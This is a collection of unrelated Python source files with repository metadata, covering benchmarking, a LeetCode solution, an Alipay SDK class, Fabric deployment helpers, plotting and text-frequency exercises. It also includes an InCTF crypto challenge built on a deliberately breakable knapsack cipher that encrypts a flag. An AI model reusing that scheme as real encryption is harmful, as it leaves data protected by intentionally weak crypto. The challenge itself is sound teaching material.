res = eval(string)
stop = time.time()
times.append(stop-start)
except MemoryError:
return np.nan
if cleanup is not None:
eval(cleanup)
return times
def Query_Call(M,N):
return np.matmul(M,np.sum(N,axis=1))
path = 'results.out'
colnames = ['Query','time1','time2','time3','time4','time5']
runTimes = pd.DataFrame(np.zeros((1,len(colnames))))
runTimes.columns = colnames
M = genfromtxt(str(sys.argv[1]), delimiter=',')
N = genfromtxt(str(sys.argv[2]), delimiter=',')
Query = 'Query_Call(M,N)'
runTimes.ix[:,'Query'] = "P2.10RW"
runTimes.ix[:,1:] = timeOp(Query)
writeHeader = not os.path.exists(path)
runTimes.to_csv(path, index=False, header = writeHeader, mode = 'a')
|
[
"hadad-paper@clt-128-93-177-51.vpn.inria.fr"
] |
hadad-paper@clt-128-93-177-51.vpn.inria.fr
|
ff68e33fd5b4b5b0f46bab5d93a2456434b1b756
|
fe6775ca8c5b42710785e3a923974ae079f92c8f
|
/code/111. 二叉树的最小深度.py
|
3e4de4635aa4de1d9e8f7a31cf17e83b061248e2
|
[] |
no_license
|
AiZhanghan/Leetcode
|
41bda6676fa1a25fa19e393553c1148ed51fdf72
|
101bce2fac8b188a4eb2f5e017293d21ad0ecb21
|
refs/heads/master
| 2021-06-28T10:48:07.865968
| 2020-11-20T09:45:15
| 2020-11-20T09:45:15
| 188,155,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def minDepth(self, root):
"""
Args:
root: TreeNode
Return:
int
"""
if not root:
return 0
if not root.left and not root.right:
return 1
res = float("inf")
if root.left:
res = min(res, self.minDepth(root.left))
if root.right:
res = min(res, self.minDepth(root.right))
return res + 1
|
[
"35103759+AiZhanghan@users.noreply.github.com"
] |
35103759+AiZhanghan@users.noreply.github.com
|
8cbcd942da4735224385ab3dbc3923e725f2b36b
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/request/AlipayMarketingCampaignDiscountBudgetQueryRequest.py
|
1c336dd763456ee791f4e197b59b28af345ec219
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,052
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayMarketingCampaignDiscountBudgetQueryModel import AlipayMarketingCampaignDiscountBudgetQueryModel
class AlipayMarketingCampaignDiscountBudgetQueryRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayMarketingCampaignDiscountBudgetQueryModel):
self._biz_content = value
else:
self._biz_content = AlipayMarketingCampaignDiscountBudgetQueryModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.marketing.campaign.discount.budget.query'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
|
[
"liuqun.lq@alibaba-inc.com"
] |
liuqun.lq@alibaba-inc.com
|
37c277ed6f27a9c565bc80f5f94a5ff4a42bba0b
|
eb7513f3e59cf5ab1dda5611627793e4391582f4
|
/fab_bundle/django.py
|
78fb35a4743d2e5d3d4dc088cb680677edfc4fa5
|
[] |
no_license
|
linovia/fab-bundle
|
69e51224216cf8d365fb128fd98165b79564fc1b
|
640544bd1d9131f8814e5dc8b4ea0d050889b502
|
refs/heads/master
| 2021-01-18T14:31:40.857998
| 2015-05-20T05:54:49
| 2015-05-20T05:54:49
| 7,828,777
| 1
| 0
| null | 2015-01-16T13:32:22
| 2013-01-25T21:21:08
|
Python
|
UTF-8
|
Python
| false
| false
| 2,021
|
py
|
from fabric.api import env, run
from .utils import die, template
from .db import postgres
def manage(command, noinput=True):
"""Runs a management command"""
noinput = '--noinput' if noinput else ''
run('%s/env/bin/django-admin.py %s %s --settings=settings' % (
env.bundle_root, command, noinput))
def database_migration():
if 'migrations' in env:
if env.migrations == 'nashvegas':
bundle_name = env.http_host
manage('upgradedb -l', noinput=False) # This creates the migration
# tables
installed = postgres(
'psql %s %s -c "select id from nashvegas_migration limit 1;"' %
('%s', bundle_name))
installed = '0 rows' not in installed
if installed:
manage('upgradedb -e', noinput=False)
else:
# 1st deploy, force syncdb and seed migrations.
manage('syncdb')
manage('upgradedb -s', noinput=False)
elif env.migrations == 'south':
manage('syncdb')
manage('migrate')
elif env.migrations == 'migrations':
manage('migrate')
else:
die("%s is not supported for migrations." % env.migrations)
else:
manage('syncdb')
def collectstatic():
if env.staticfiles:
manage('collectstatic')
def setup():
if 'media_url' not in env:
env.media_url = '/media/'
if 'media_root' not in env:
env.media_root = env.bundle_root + '/public' + env.media_url
if 'static_url' not in env:
env.static_url = '/static/'
if 'static_root' not in env:
env.static_root = env.bundle_root + '/public' + env.static_url
if not 'staticfiles' in env:
env.staticfiles = True
if not 'cache' in env:
env.cache = 0 # redis DB
template('settings.py', '%s/settings.py' % env.bundle_root)
template('wsgi.py', '%s/wsgi.py' % env.bundle_root)
|
[
"xordoquy@linovia.com"
] |
xordoquy@linovia.com
|
339acf442deb6e5204b27de4e42be183a8496e8c
|
59453f279255ed7e65ba6b134ab428e5b8c3a565
|
/chapter4/ans_34.py
|
b4b3668a3cccd7a562615202cfff8e5c6bc2952a
|
[] |
no_license
|
takapy0210/nlp_2020
|
b42497f0db95f947e7ad61ec058769e824bbbc9c
|
085747a8c22573a095658e202faccb7197a7041e
|
refs/heads/master
| 2023-07-12T20:32:34.225335
| 2021-08-21T04:31:12
| 2021-08-21T04:31:12
| 258,741,277
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,051
|
py
|
"""
名詞の連接(連続して出現する名詞)を最長一致で抽出せよ.
"""
def parse_morpheme(morpheme):
(surface, attr) = morpheme.split('\t')
attr = attr.split(',')
morpheme_dict = {
'surface': surface,
'base': attr[6],
'pos': attr[0],
'pos1': attr[1]
}
return morpheme_dict
def get_value(items):
ret = []
noun_list = []
for i, x in enumerate(items):
if x['pos'] == '名詞':
if items[i+1]['pos'] == '名詞':
noun_list.append(x['surface'])
else:
if len(noun_list) >= 1:
noun_list.append(x['surface'])
ret.append(noun_list)
noun_list = []
return ret
file = 'neko.txt.mecab'
with open(file, mode='rt', encoding='utf-8') as f:
morphemes_list = [s.strip('EOS\n') for s in f.readlines()]
morphemes_list = [s for s in morphemes_list if s != '']
ans_list = list(map(parse_morpheme, morphemes_list))
ans = get_value(ans_list)
print(ans[:5])
|
[
"takanobu.030210@gmail.com"
] |
takanobu.030210@gmail.com
|
7c92ef5096f56c6a4b16819e0acc383015d28bf6
|
40f4908483b98fc4f370ff4f2d520e1284d045b3
|
/phase02/immortals_repo/harness/pymmortals/generated/com/securboration/immortals/ontology/expression/expressionnodenumerical.py
|
febd6b50e97fc22a14dfb1027c13f4ae466cba44
|
[] |
no_license
|
TF-185/bbn-immortals
|
7f70610bdbbcbf649f3d9021f087baaa76f0d8ca
|
e298540f7b5f201779213850291337a8bded66c7
|
refs/heads/master
| 2023-05-31T00:16:42.522840
| 2019-10-24T21:45:07
| 2019-10-24T21:45:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
from pymmortals.generated.com.securboration.immortals.ontology.expression.booleanexpressionnode import BooleanExpressionNode
# noinspection PyPep8Naming
class ExpressionNodeNumerical(BooleanExpressionNode):
_validator_values = dict()
_types = dict()
def __init__(self):
super().__init__()
|
[
"awellman@bbn.com"
] |
awellman@bbn.com
|
d35d55dc09e71211c9c1ab9c5f08da0e330fe2f5
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02261/s604578340.py
|
adf89a926b10d9913875be65ef10f9e9f300870a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
def BubbleTrump(C, N):
i = 0
while i < N:
j = N - 1
while j > i:
if int(C[j][1]) < int(C[j-1][1]):
c = C[j]
C[j] = C[j - 1]
C[j - 1] = c
j -= 1
i += 1
return C
def SelectionTrump(C, N):
i = 0
while i < N:
minj = i
j = i
while j < N:
if int(C[j][1]) < int(C[minj][1]):
minj = j
j += 1
if minj != i:
c = C[i]
C[i] = C[minj]
C[minj] = c
i += 1
return C
n = int(input())
C = list(map(str, input().split(' ')))
ans = ''
Cb = BubbleTrump(C.copy(), n)
ans += ' '.join(map(str, Cb)) + '\nStable\n'
Cs = SelectionTrump(C.copy(), n)
q = 0
f = 1
while q < n:
if Cb[q] != Cs[q]:
f = 0
q += 1
ans += ' '.join(map(str, Cs)) + '\n'
if f == 0:
ans += 'Not stable'
else:
ans += 'Stable'
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
52af64e512464476b3c7a71be4c14934d950a785
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03095/s821591285.py
|
5426f4262b305dbd1540275eb9ed8bdc4c475f98
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 214
|
py
|
from collections import Counter
n = int(input())
s = input()
mod = 10**9+7
scnt = Counter(s).most_common()
ans = 1
for i in range(len(scnt)):
ans = ans*(scnt[i][1]+1)%mod
ans = (ans - 1 + mod)%mod
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
54e92565033d5c76621554dac95020cc7b579dc2
|
fa5713863cada0177d15e56f5327b79d907a119f
|
/test/compare_releases.py
|
70cf5e5907f8577f16a47c9a3461b04ef5c48543
|
[] |
no_license
|
rappoccio/EXOVV
|
1500c126d8053b47fbc425d1c2f9e76f14cb75c5
|
db96edf661398b5bab131bbeba36d331b180d12d
|
refs/heads/master
| 2020-04-03T20:12:57.959191
| 2018-08-24T01:30:03
| 2018-08-24T01:30:03
| 39,910,319
| 4
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,404
|
py
|
#!/usr/bin/env python
from optparse import OptionParser
from jettools import getJER
from math import sqrt
parser = OptionParser()
parser.add_option('--outname', type='string', action='store',
dest='outname',
default = "",
help='Histogram to plot')
(options, args) = parser.parse_args()
argv = []
print options
import ROOT
import array
import math
import random
ROOT.gStyle.SetOptStat(000000)
#ROOT.gROOT.Macro("rootlogon.C")
#ROOT.gStyle.SetPadRightMargin(0.15)
ROOT.gStyle.SetOptStat(000000)
ROOT.gStyle.SetTitleFont(43)
#ROOT.gStyle.SetTitleFontSize(0.05)
ROOT.gStyle.SetTitleFont(43, "XYZ")
ROOT.gStyle.SetTitleSize(30, "XYZ")
ROOT.gStyle.SetTitleOffset(3.5, "X")
ROOT.gStyle.SetTitleOffset(1.5, "Y")
ROOT.gStyle.SetLabelFont(43, "XYZ")
ROOT.gStyle.SetLabelSize(24, "XYZ")
def setupPads(canv, pads):
canv.cd()
pad1 = ROOT.TPad('pad' + canv.GetName() + '1', 'pad' + canv.GetName() + '1', 0., 0.3, 1.0, 1.0)
pad1.SetBottomMargin(0)
pad2 = ROOT.TPad('pad' + canv.GetName() + '2', 'pad' + canv.GetName() + '2', 0., 0.0, 1.0, 0.3)
pad2.SetTopMargin(0)
pad1.SetLeftMargin(0.20)
pad2.SetLeftMargin(0.20)
pad2.SetBottomMargin(0.5)
pad1.Draw()
pad2.Draw()
pads.append( [pad1,pad2] )
return [pad1, pad2]
samples = [
['responses_repdf_otherway_qcdmc_2dplots.root', '7.6.x', 1, 1],
['responses_otherway_qcdmc.root', '7.4.x', 2, 2]
]
names = [
"h_pt_meas",
"h_y_meas",
"h_phi_meas",
"h_m_meas",
"h_msd_meas",
"h_rho_meas",
"h_tau21_meas",
"h_dphi_meas",
"h_ptasym_meas",
]
hists = []
stacks = []
f = []
legs = []
for isample in xrange( len(samples) ) :
f.append( ROOT.TFile(samples[isample][0] ) )
hists.append( [] )
for iname in xrange( len(names) ) :
htemp = f[isample].Get(names[iname] )
htemp.UseCurrentStyle()
#if htemp.Integral() > 0 :
# htemp.Scale( 1.0 / htemp.Integral() )
htemp.SetLineStyle(samples[isample][2])
htemp.SetLineColor(samples[isample][3])
hists[isample].append( htemp )
canvs = []
allpads = []
ratios = []
for iname in xrange( len(names) ) :
c = ROOT.TCanvas("c" + str(iname), "c" + str(iname), 800, 600 )
pads = setupPads(c, allpads)
pads[0].cd()
hists[0][iname].Draw("hist")
hists[1][iname].Draw("hist same")
leg = ROOT.TLegend(0.6, 0.6, 0.85, 0.85)
leg.SetFillColor(0)
leg.SetBorderSize(0)
leg.AddEntry( hists[0][iname], samples[0][1], 'l' )
leg.AddEntry( hists[1][iname], samples[1][1], 'l' )
leg.Draw()
legs.append(leg)
max0 = hists[0][iname].GetMaximum()
max1 = hists[1][iname].GetMaximum()
maxtot = max( max0, max1) * 1.2
hists[0][iname].SetMaximum(maxtot)
pads[0].SetLogy()
pads[0].Update()
pads[1].cd()
ratio = hists[1][iname].Clone( hists[1][iname].GetName() + "clone")
ratio.Divide( hists[0][iname] )
ratio.SetTitle("")
ratio.GetYaxis().SetTitle("Ratio")
ratio.Draw("e")
ratio.GetYaxis().SetRangeUser(0.9,1.1)
ratio.GetYaxis().SetNdivisions(2,4,0,False)
ratios.append(ratio)
pads[1].Update()
c.Update()
c.Print( 'compare_' + options.outname + names[iname] + ".png", "png")
c.Print( 'compare_' + options.outname + names[iname] + ".pdf", "pdf")
canvs.append(c)
|
[
"rappoccio@gmail.com"
] |
rappoccio@gmail.com
|
4d422bbbbeeb2c15974cfa4de441a3c6671ccf70
|
3a857528f238c9460fd7c14fc0477a9bee0974a5
|
/ipycanvas/_frontend.py
|
2da2ede4429a6af5aed88050218d375c62a47c5c
|
[
"BSD-3-Clause"
] |
permissive
|
amoeba/ipycanvas
|
aafb38b341828f0ff69cc4816ea3ab169096c251
|
0cc98b4d0cd1dc7a0b4057fe8d5d276efdb55928
|
refs/heads/master
| 2023-02-04T21:58:01.556211
| 2020-12-17T20:42:01
| 2020-12-17T20:42:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Martin Renou.
# Distributed under the terms of the Modified BSD License.
"""
Information about the frontend package of the widgets.
"""
module_name = "ipycanvas"
module_version = "^0.7.0"
|
[
"martin.renou@gmail.com"
] |
martin.renou@gmail.com
|
8f0e1b6af08c0ba68ced1a36c3dd18973cf224ab
|
5292b03998384c0d2bb5858058892d7e45c5365b
|
/InCTF/2021/crypto/Lost_Baggage/main.py
|
2db4763071280ad4c8a5294fa28c99cb3bb0c207
|
[
"MIT"
] |
permissive
|
TheusZer0/ctf-archives
|
430ef80d367b44fd81449bcb108e367842cb8e39
|
033ccf8dab0abdbdbbaa4f0092ab589288ddb4bd
|
refs/heads/main
| 2023-09-04T17:56:24.416820
| 2021-11-21T06:51:27
| 2021-11-21T06:51:27
| 430,603,430
| 1
| 0
|
MIT
| 2021-11-22T07:24:08
| 2021-11-22T07:24:07
| null |
UTF-8
|
Python
| false
| false
| 1,119
|
py
|
#!/usr/bin/python3
from random import getrandbits as rand
from gmpy2 import next_prime, invert
import pickle
FLAG = open('flag.txt', 'rb').read()
BUF = 16
def encrypt(msg, key):
msg = format(int(msg.hex(), 16), f'0{len(msg)*8}b')[::-1]
assert len(msg) == len(key)
return sum([k if m=='1' else 0 for m, k in zip(msg, key)])
def decrypt(ct, pv):
b, r, q = pv
ct = (invert(r, q)*ct)%q
msg = ''
for i in b[::-1]:
if ct >= i:
msg += '1'
ct -= i
else:
msg += '0'
return bytes.fromhex(hex(int(msg, 2))[2:])
def gen_inc_list(size, tmp=5):
b = [next_prime(tmp+rand(BUF))]
while len(b)!=size:
val = rand(BUF)
while tmp<sum(b)+val:
tmp = next_prime(tmp<<1)
b += [tmp]
return list(map(int, b))
def gen_key(size):
b = gen_inc_list(size)
q = b[-1]
for i in range(rand(BUF//2)):
q = int(next_prime(q<<1))
r = b[-1]+rand(BUF<<3)
pb = [(r*i)%q for i in b]
return (b, r, q), pb
if __name__ == '__main__':
pvkey, pbkey = gen_key(len(FLAG) * 8)
cip = encrypt(FLAG, pbkey)
assert FLAG == decrypt(cip, pvkey)
pickle.dump({'cip': cip, 'pbkey': pbkey}, open('enc.pickle', 'wb'))
|
[
"sajjadium@google.com"
] |
sajjadium@google.com
|
12cf8b1fc6f4b7f9991b27ccfa0db18d53281139
|
d96ffbadf4526db6c30a3278f644c1bc25ff4054
|
/src/flickr/city.py
|
54ab51925d971f99e12f845cbc74900f03e05b10
|
[
"MIT"
] |
permissive
|
dballesteros7/master-thesis-2015
|
07c03726f6ceb66e6d706ffe06e4e5eb37dcda75
|
8c0bf9a6eef172fc8167a30780ae0666f8ea2d88
|
refs/heads/master
| 2021-05-03T11:22:28.333473
| 2016-04-26T14:00:30
| 2016-04-26T14:00:30
| 44,601,064
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 563
|
py
|
from enum import Enum
from flickr.boundingbox import BoundingBox
class City(Enum):
LONDON = ('london', BoundingBox(51.672343, 0.148271, 51.384940, -0.351468))
ZURICH = ('zurich', BoundingBox(47.434680, 8.625370, 47.320230, 8.448060))
NEW_YORK = ('new-york', BoundingBox(40.915256, -73.700272, 40.491370, -74.259090))
SHANGHAI = ('shanghai', BoundingBox(31.868217, 122.247066, 30.680270, 120.858217))
def __init__(self, city_name: str, bounding_box: BoundingBox):
self.city_name = city_name
self.bounding_box = bounding_box
|
[
"diegob@student.ethz.ch"
] |
diegob@student.ethz.ch
|
52ea565222d6051d93f5b73b48e501c55e9bd1ce
|
736032949e6ec4291dba0b06a441efe9d8ad2b82
|
/colegio/models.py
|
451bf327c02291b724848dab273618cf88c656d4
|
[] |
no_license
|
CoriAle/Examen-Final
|
b93498e10818d91cb672ef216dbc1663cb1973ef
|
bcbdecce989ee55e85c0dbfbf22c20950bfd2199
|
refs/heads/master
| 2021-08-26T05:32:34.204416
| 2017-11-21T18:56:45
| 2017-11-21T18:56:45
| 111,577,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,611
|
py
|
from django.db import models
from django.utils import timezone
from django.contrib import admin
class Alumno(models.Model):
carnet=models.CharField(max_length=50)
nombre=models.CharField(max_length=50)
apellido=models.CharField(max_length=50)
fecha_nacimiento = models.DateField()
def __str__(self):
return '{}'.format(self.nombre)
class Profesor(models.Model):
nombre=models.CharField(max_length=50)
apellido=models.CharField(max_length=50)
fecha_nacimiento = models.DateField()
profesion=models.CharField(max_length=50)
def __str__(self):
return '{}'.format(self.nombre)
class Materia(models.Model):
nombre=models.CharField(max_length=50)
creditos= models.IntegerField()
alumno = models.ManyToManyField(Alumno, through='Nota')
profesor = models.ForeignKey(Profesor,null=True )
def __str__(self):
return '{}'.format(self.nombre)
class Nota (models.Model):
material = models.ForeignKey(Materia, on_delete=models.CASCADE)
alumno = models.ForeignKey(Alumno, on_delete=models.CASCADE)
nota = models.CharField(max_length=50, blank=True)
class NotaInLine(admin.TabularInline):
model = Nota
extra = 1
class MateriaAdmin(admin.ModelAdmin):
inlines = (NotaInLine,)
class AlumnoAdmin (admin.ModelAdmin):
inlines = (NotaInLine,)
class Grado(models.Model):
"""docstring forGrado."""
nombre = models.CharField(max_length=50)
seccion = models.CharField(max_length=10)
materia = models.ManyToManyField(Materia, blank=True)
def __str__(self):
return '{}'.format(self.nombre)
|
[
"1995coral@hotmail.es"
] |
1995coral@hotmail.es
|
127b3622e28069bc808f7dc1542354d21e9dce3c
|
80b5bc903e5ceb368f374f9a1313e1dc7ac698c2
|
/bcoffice/members/views/member_force_disable.py
|
1dbe2b8b190ef21b05374aca59a95a45fed30cbc
|
[] |
no_license
|
Bobur-kobilov/back
|
830471f7d36f9120aa04e3ae884f7091f0ba4333
|
5a852c4d24da3db6226ce17c437c4ae9c6b01141
|
refs/heads/master
| 2022-10-01T22:50:24.073570
| 2019-08-02T01:51:19
| 2019-08-02T01:51:19
| 200,145,509
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,360
|
py
|
from . import *
import pytz
# 회원 강제 상태변경
class MemberForceDisable(APIView):
name = "member-force-disable"
permission_classes = [MemberForceDisablePermission]
def put(self, request, *args, **kwargs):
member_id = request.data.get('member_id', None)
reason = request.data.get('reason', None)
authType = request.data.get('authType', None)
if member_id is None:
return Response( # "{0} 파라미터가 없습니다."
data=ResponseMessage.getMessageData(ResponseMessage.MESSAGE_ERR00017.format('member_id'))
, status=status.HTTP_400_BAD_REQUEST
)
auth_type = None
request_after = None
if authType == 'factor_auth':
auth_type = request.data.get('auth_type', None)
if auth_type is None:
return Response( # "{0} 파라미터가 없습니다."
data=ResponseMessage.getMessageData(ResponseMessage.MESSAGE_ERR00017.format('auth_type'))
, status=status.HTTP_400_BAD_REQUEST
)
else:
request_after = request.data.get('after', None)
if request_after is None:
return Response( # "{0} 파라미터가 없습니다."
data=ResponseMessage.getMessageData(ResponseMessage.MESSAGE_ERR00017.format('after'))
, status=status.HTTP_400_BAD_REQUEST
)
category = ""
if authType == 'factor_auth':
factor_type = ""
if auth_type == 'app':
category = "OTP 인증해제"
factor_type = "TwoFactor::App"
elif auth_type == 'sms':
category = "SMS 인증해제"
factor_type = "TwoFactor::Sms"
before = (TwoFactors.objects.using("exchange").filter(member_id=member_id).filter(type=factor_type))[0].activated
after = int(not before)
else:
VALUE_BY_TYPE = {
'kyc_auth' : {'category': '신분증 인증', 'db_column': 'kyc_activated'},
'disable': {'category': '계정비활성화', 'db_column': 'disabled'},
'restrict': {'category': '이용제한', 'db_column': 'restricted'},
'deleted': {'category': '회원탈퇴', 'db_column': 'deleted'},
}
category = VALUE_BY_TYPE[authType]['category']
column = VALUE_BY_TYPE[authType]['db_column']
before = Members.objects.using("exchange").values(column).get(id=member_id)[column]
after = request_after
if before == after:
return Response( # "현재상태와 변경하려는 상태가 동일합니다."
data=ResponseMessage.getMessageData(ResponseMessage.MESSAGE_ERR00032)
, status=status.HTTP_400_BAD_REQUEST
)
user = User.objects.get(id=request.user.get_id())
body = {
"user_id": request.user.get_id()
, "emp_no": user.emp_no
, "member_id": int(member_id)
, "category": category
, "before": before
, "after": after
, "reason": reason
, "created_at": str(datetime.now(pytz.timezone('Asia/Seoul')))
}
API_BY_TYPE = {
'factor_auth': {'api': APIService.MEMBER_TWO_FACTOR, 'params': {'member_id': member_id, 'auth_type': auth_type}},
'kyc_auth': {'api': APIService.MEMBER_KYC_AUTH, 'params': {'member_id': member_id, 'active': request_after}},
'disable': {'api': APIService.MEMBER_DISABLE, 'params': {'member_id': member_id, 'disable': request_after}},
'restrict': {'api': APIService.MEMBER_RESTRICT, 'params': {'member_id': member_id, 'restrict': request_after}},
'deleted': {'api': APIService.MEMBER_DELETED, 'params': {'member_id': member_id}},
}
response = APIService.request_api(request, API_BY_TYPE[authType]['api'], API_BY_TYPE[authType]['params'])
log = CentralLogging()
log.setLog(body, request, UPDATE, response.status_code, 1200)
# MONGO DB 추가
# body = json.dumps(log).encode('utf8')
logging_utils.set_log(TBL_BCOFFICE_MEMBER_MOD, log.toJsonString())
return response
|
[
"bobur0114jon@gmail.com"
] |
bobur0114jon@gmail.com
|
5e8d232feecaf3739a9c05723fb003384adf5152
|
23ae328d533fafdeb8b49b8a66911a9e9aef4e83
|
/exercises/1901090010/1001S02E06_stats_word.py
|
0b2d0b586169d3cc48703ba0459b9c517888bf39
|
[] |
no_license
|
sky3116391/selfteaching-python-camp
|
85b35ba16e014e7d1c2545e450a22021acd668e7
|
635a74035b37bdd4e37919a81848e86bdb853a11
|
refs/heads/master
| 2020-05-25T15:51:30.853311
| 2019-05-30T06:49:20
| 2019-05-30T06:49:20
| 187,006,599
| 0
| 0
| null | 2019-05-16T10:32:55
| 2019-05-16T10:32:55
| null |
UTF-8
|
Python
| false
| false
| 3,945
|
py
|
import re
#(1)定义一个名为 stats_text_en 的函数
def stats_text_en(text):
#(2)函数接受一个字符串 text 作为参数。如果不是字符串,则提示
if not isinstance(text,str):
return '请输入字符串'
#(3)统计参数中每个英文单词出现的次数
# 1.替换掉所有的符号
word_str = text.replace(','," ").replace('.'," ").replace('!'," ").replace('*'," ").replace('--'," ")
# 2.按照空格将所有的单词分割开
word_list = word_str.split()
# 3.对单词进行去重操作,作为字典的key
word_one = set(word_list)
# 4.构建一个词频字典
dict = {}
for word in word_one:
dict[word] = word_list.count(word)
# 5.对之前的词频字典按照value值进行排序
d_list = sorted(dict.items(),key=lambda e:e[1],reverse=True)
return d_list
#(1)定义一个名为 stats_text_en 的函数
def stats_text_cn(text):
#(2)函数接受一个字符串 text 作为参数。如果不是字符串,则提示
if not isinstance(text,str):
return '请输入字符串'
# 1.替换掉所有的符号
d = text.replace(',','').replace('-',' ').replace('.','').replace(':','').replace('《','').replace(';','').replace('"','').replace('!','').replace('?','').replace('》',' ').replace('、','').replace(',','').replace('。','').replace('“','').replace('”','').replace(':','').replace(';','').replace('\n','').replace('!','').replace('?','').replace('/','').replace('*',' ').replace(' ','').replace("'",'')
# 2.将上文中的字符串,用正则运算剔除所有英文字母单词,数字
d = re.sub("[A-Za-z0-9]", "", d)
print(d)
# 3.将字符串中的汉字去重,作为字典的key
d_list = list(d)
print(d_list)
d_index = set(d_list)
# 4.构造词频字典
dict = {}
for i in d_index:
dict[i] = d_list.count(i)
# 5.对之前的词频字典按照value值进行排序
d_list = sorted(dict.items(),key=lambda e:e[1],reverse=True)
return d_list
if __name__ == "__main__":
# 测试统计英文单词词频的函数
text = '''
Fall Day (by J. B. Leishman)
Lord, it is time. This was a very big summer.
Lay your shadows over the sundial,
and let the winds loose on the fields.
Command the last fruits to be full;
give them two more sunny days,
urge them on to fulfillment and throw
the last sweetness into the heavy wine.
Who has no house now, will never build one.
Whoever is alone now, will long remain so,
Will watch, read, write long letters
and will wander in the streets, here and there
restlessly, when the leaves blow.
'''
# 测试不是字符串的情况
test_num = 1
# 测试正常情况
array = stats_text_en(text)
print(array)
# 测试统计中文词频的函数
text = '''
English : Fall Day by J. B. Leishman
Lord, it is time. This was a very big summer.
Lay your shadows over the sundial,
and let the winds loose on the fields.
Command the last fruits to be full;
give them two more sunny days,
urge them on to fulfillment and throw
the last sweetness into the heavy wine.
Who has no house now, will never build one.
Whoever is alone now, will long remain so,
Will watch, read, write long letters
and will wander in the streets, here and there
restlessly, when the leaves blow.
中译一:《秋日》 冯至
1905-1993。著名诗人、翻译家。
主啊!是时候了。夏日曾经很盛大。
把你的阴影落在日规上,
让秋风刮过田野。
让最后的果实长得丰满,
再给它们两天南方的气候,
迫使它们成熟,
把最后的甘甜酿入浓酒。
谁这时没有房屋,就不必建筑,
谁这时孤独,就永远孤独,
就醒着,读着,写着长信,
